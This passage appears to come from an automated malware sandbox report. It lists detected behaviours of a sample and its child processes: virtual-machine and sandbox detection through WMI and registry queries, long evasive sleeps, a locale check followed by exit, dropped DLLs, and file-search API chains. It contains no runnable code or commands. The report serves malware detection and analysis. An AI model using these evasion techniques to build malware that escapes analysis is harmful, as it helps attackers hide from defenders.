Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1160000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2C70000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 11D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Memory allocated: 240F5580000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Memory allocated: 240F70A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: EE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2810000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4810000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 4147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 5298
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Window / User API: threadDelayed 2852
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Window / User API: threadDelayed 5685
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Window / User API: threadDelayed 1005
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\khjsru Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5c4.2\relay.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pasb Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\kO1P1YnLst.exe API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe API coverage: 1.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148 Thread sleep time: -59890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148 Thread sleep time: -59759s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -35061s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -33546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -46089s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -35909s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -53012s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -42762s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -37957s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -44100s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -53130s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -47778s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -58713s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4432 Thread sleep time: -720000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -51372s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -36960s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7180 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -31764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -54171s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -37432s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -46986s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -54476s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -55005s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -46201s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -58676s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -42529s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -57709s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -49722s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -54003s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -36205s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -41023s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -35972s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -33757s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -48291s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -49249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -45123s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -44683s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -51805s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -54334s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -35511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -49472s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -57176s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -39332s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -50567s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -32333s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -50212s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -36658s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -33896s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -45798s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -40868s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -47604s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -55594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -39496s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8060 Thread sleep time: -58378s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 5004 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 1780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe TID: 3664 Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe TID: 3664 Thread sleep time: -41238s >= -30000s
Queries keyboard layouts
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809 Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040DB60
